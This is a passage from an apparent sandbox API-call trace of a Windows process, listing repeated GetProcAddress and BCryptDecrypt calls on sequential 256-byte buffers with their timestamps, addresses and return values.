GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.774] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e811, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e811, pcbResult=0x14f8fc) returned 0x0 [0177.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.776] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9bad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e906, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e906, pcbResult=0x14f8fc) returned 0x0 [0177.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.778] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9bbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e9fb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e9fb, pcbResult=0x14f8fc) returned 0x0 [0177.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.781] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9bcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205eaf0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205eaf0, pcbResult=0x14f8fc) returned 0x0 [0178.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.023] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9bdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205ebe5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205ebe5, pcbResult=0x14f8fc) returned 0x0 [0178.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.025] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9bed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205ecda, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205ecda, pcbResult=0x14f8fc) returned 0x0 [0178.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.028] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9bfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205edcf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205edcf, pcbResult=0x14f8fc) returned 0x0 [0178.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.031] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205eec4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205eec4, pcbResult=0x14f8fc) returned 0x0 [0178.033] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.033] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205efb9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205efb9, pcbResult=0x14f8fc) returned 0x0 [0178.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.035] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f0ae, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f0ae, pcbResult=0x14f8fc) returned 0x0 [0178.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.039] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f1a3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f1a3, pcbResult=0x14f8fc) returned 0x0 [0178.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.041] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f298, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f298, pcbResult=0x14f8fc) returned 0x0 [0178.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.043] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f38d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f38d, pcbResult=0x14f8fc) returned 0x0 [0178.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.046] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f482, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f482, pcbResult=0x14f8fc) returned 0x0 [0178.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.048] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f577, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f577, pcbResult=0x14f8fc) returned 0x0 [0178.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.051] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f66c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f66c, pcbResult=0x14f8fc) returned 0x0 [0178.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.053] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9c9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f761, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f761, pcbResult=0x14f8fc) returned 0x0 [0178.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.056] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9cad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f856, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f856, pcbResult=0x14f8fc) returned 0x0 [0178.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.187] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9cbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205f94b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205f94b, pcbResult=0x14f8fc) returned 0x0 [0178.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.188] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ccd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205fa40, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205fa40, pcbResult=0x14f8fc) returned 0x0 [0178.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.190] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9cdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205fb35, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205fb35, pcbResult=0x14f8fc) returned 0x0 [0178.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.191] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ced0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205fc2a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205fc2a, pcbResult=0x14f8fc) returned 0x0 [0178.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.192] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9cfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205fd1f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205fd1f, pcbResult=0x14f8fc) returned 0x0 [0178.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.194] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205fe14, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205fe14, pcbResult=0x14f8fc) returned 0x0 [0178.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.196] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205ff09, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205ff09, pcbResult=0x14f8fc) returned 0x0 [0178.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.198] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205fffe, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205fffe, pcbResult=0x14f8fc) returned 0x0 [0178.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.199] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20600f3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20600f3, pcbResult=0x14f8fc) returned 0x0 [0178.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.200] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20601e8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20601e8, pcbResult=0x14f8fc) returned 0x0 [0178.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.202] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20602dd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20602dd, pcbResult=0x14f8fc) returned 0x0 [0178.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.203] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20603d2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20603d2, pcbResult=0x14f8fc) returned 0x0 [0178.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.205] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20604c7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20604c7, pcbResult=0x14f8fc) returned 0x0 [0178.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.207] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20605bc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20605bc, pcbResult=0x14f8fc) returned 0x0 [0178.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.209] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9d9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20606b1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20606b1, pcbResult=0x14f8fc) returned 0x0 [0178.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.211] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9dad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20607a6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20607a6, pcbResult=0x14f8fc) returned 0x0 [0178.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.212] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9dbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206089b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206089b, pcbResult=0x14f8fc) returned 0x0 [0178.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.213] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9dcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060990, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060990, pcbResult=0x14f8fc) returned 0x0 [0178.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.215] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ddd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060a85, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060a85, pcbResult=0x14f8fc) returned 0x0 [0178.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.217] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ded0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060b7a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060b7a, pcbResult=0x14f8fc) returned 0x0 [0178.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.219] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9dfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060c6f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060c6f, pcbResult=0x14f8fc) returned 0x0 [0178.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.344] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060d64, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060d64, pcbResult=0x14f8fc) returned 0x0 [0178.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.346] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060e59, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060e59, pcbResult=0x14f8fc) returned 0x0 [0178.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.348] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2060f4e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2060f4e, pcbResult=0x14f8fc) returned 0x0 [0178.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.351] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061043, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061043, pcbResult=0x14f8fc) returned 0x0 [0178.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.353] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061138, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061138, pcbResult=0x14f8fc) returned 0x0 [0178.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.355] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206122d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206122d, pcbResult=0x14f8fc) returned 0x0 [0178.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.357] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061322, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061322, pcbResult=0x14f8fc) returned 0x0 [0178.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.360] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061417, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061417, pcbResult=0x14f8fc) returned 0x0 [0178.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.362] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206150c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206150c, pcbResult=0x14f8fc) returned 0x0 [0178.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.364] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9e9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061601, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061601, pcbResult=0x14f8fc) returned 0x0 [0178.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.367] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ead0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20616f6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20616f6, pcbResult=0x14f8fc) returned 0x0 [0178.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.369] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ebd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20617eb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20617eb, pcbResult=0x14f8fc) returned 0x0 [0178.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.372] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ecd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20618e0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20618e0, pcbResult=0x14f8fc) returned 0x0 [0178.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.374] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9edd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20619d5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20619d5, pcbResult=0x14f8fc) returned 0x0 [0178.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.376] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9eed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061aca, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061aca, pcbResult=0x14f8fc) returned 0x0 [0178.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.378] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9efd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061bbf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061bbf, pcbResult=0x14f8fc) returned 0x0 [0178.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.509] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061cb4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061cb4, pcbResult=0x14f8fc) returned 0x0 [0178.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.511] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061da9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061da9, pcbResult=0x14f8fc) returned 0x0 [0178.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.513] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061e9e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061e9e, pcbResult=0x14f8fc) returned 0x0 [0178.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.515] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2061f93, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2061f93, pcbResult=0x14f8fc) returned 0x0 [0178.517] GetProcAddress (hModule=0x7ffc5bcc0000, 